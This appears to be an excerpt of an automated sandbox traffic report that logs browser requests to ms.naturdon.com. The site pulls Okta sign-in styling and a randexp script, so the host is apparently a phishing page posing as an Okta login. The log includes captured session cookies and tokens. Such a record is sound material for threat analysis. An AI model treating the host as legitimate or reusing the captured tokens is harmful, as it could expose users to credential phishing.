laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveOrigin: https://ms.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveOrigin: https://ms.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveOrigin: https://ms.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /56yq2nzzAZjcnfYKxPLQIlvxklVwZtCP7Ar9f289103 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250324%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T172328Z&X-Amz-Expires=300&X-Amz-Signature=d5880db6b15e8535827ffcf6ad0fc5b0eba442c0d6eb640d138aec4dc09301b3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ijDh3NnwhFxGLRV4LwW2300gHnRdqrb51FENUw7805QPX1NNab230 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kleRO9JVys2NlTKKYiRt12w9NfiqKjLiiBbqOE07EDpVPCYTbXYoOXDS2ZtRvcD9w4YjWzcKTWa9tmSgbDuolYpqsXv8GNph76iirb3Gh5eLR6hFTzubcQLg5pdZAdNeB8tRVtUFZIBB7Uj497bIA4m2QpRzW8rW7SPyz660 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /bchOwVqc98OOMxFnOkwnvkShNcSm0gU7WWsoh0kKAgri2ChjJkmLJPqsWUfGanp0uBm39YhI6pI8EfQbZqVGjekVGFrK5k97cDmn4NuLgYwOOxiNl3EBbfJ4ReUGdrShKoJ6AAcUp1LOhPfarPQ0dVtop662 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxE3arEkk2RbNb59NyJropvgEEl7AIwr34125 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijDh3NnwhFxGLRV4LwW2300gHnRdqrb51FENUw7805QPX1NNab230 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kleRO9JVys2NlTKKYiRt12w9NfiqKjLiiBbqOE07EDpVPCYTbXYoOXDS2ZtRvcD9w4YjWzcKTWa9tmSgbDuolYpqsXv8GNph76iirb3Gh5eLR6hFTzubcQLg5pdZAdNeB8tRVtUFZIBB7Uj497bIA4m2QpRzW8rW7SPyz660 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opSQsIIfCrYEifeBNcpBzLABefvLCJwGmOyMuRzcmBuX45133 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
